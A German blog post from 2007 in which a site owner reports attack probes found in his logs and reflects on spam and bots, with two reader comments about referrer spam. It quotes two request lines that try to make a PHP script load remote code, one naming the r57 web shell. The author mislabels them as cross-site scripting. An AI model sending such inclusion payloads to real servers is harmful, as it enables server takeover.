Skip to content

CSS-Attacke auf metablog.ch

Seit kurzem sehe ich zahlreiche Zugriffe der folgenden Art auf metablog.ch:

/order.php?wp=http://www.spycorp-labs.com/echo.txt?
/order.php?wp=http://www.evilc0der.com/r57.txt??

Da sucht offenbar jemand nach PHP-Scripts, welche unzureichend gegen Cross-Site Scripting geschützt sind. spycorp-labs.com und evilc0der.com sind diesbezüglich hinlänglich bekannt. Und wie’s aussieht habe ich Glück, kein anfälliges WordPress Plugin installiert zu haben.

Also eigentlich nix besonderes. Eine Medienmitteilung muss ich deswegen sicher nicht rauslassen (wenn ich ich auch einige Blogger kenne, die das sofort tun würden <g> ). Ich frage mich nur langsam, wie das weiter gehen soll: Der grösste Teil der weltweit versandten Mails ist Spam oder Viren; die allermeisten Blog-Kommentare sind Spam; es sind unzählige Bots unterwegs die versuchen, Server zu hacken und für illegale Zwecke zu missbrauchen. Das ist eine ungeheure Ressourcen-Verschwendung. Was unternimmt eigentlich die Industrie dagegen? Die dreht vermutlich Däumchen, reicht sämtliche Kosten an ihre Kunden weiter und schiebt ansonsten den Schwarzen Peter der Regierung zu.

2 Comments

  1. Matthias wrote:

    Und was soll jetzt das wieder in meiner Referer-Liste:

    metablog.ch/?www.bruehwiler.info/blog&paged=8
    metablog.ch/?www.bruehwiler.info/blog&paged=15

    Das prallt hier tonnenweise auf. Ist das Referrer-Spam?

    Wednesday, September 19, 2007 at 11:47 | Permalink
  2. Matthias wrote:

    Ach so, das war ein durchgeknallter Suchroboter. Den habe ich jetzt ausgesperrt. Fragt sich nur, woher er die Idee bekommen hat, diese URLs zu suchen; könnte es sein, dass er als Referrer-Bot missbraucht wurde?

    Wednesday, September 19, 2007 at 21:17 | Permalink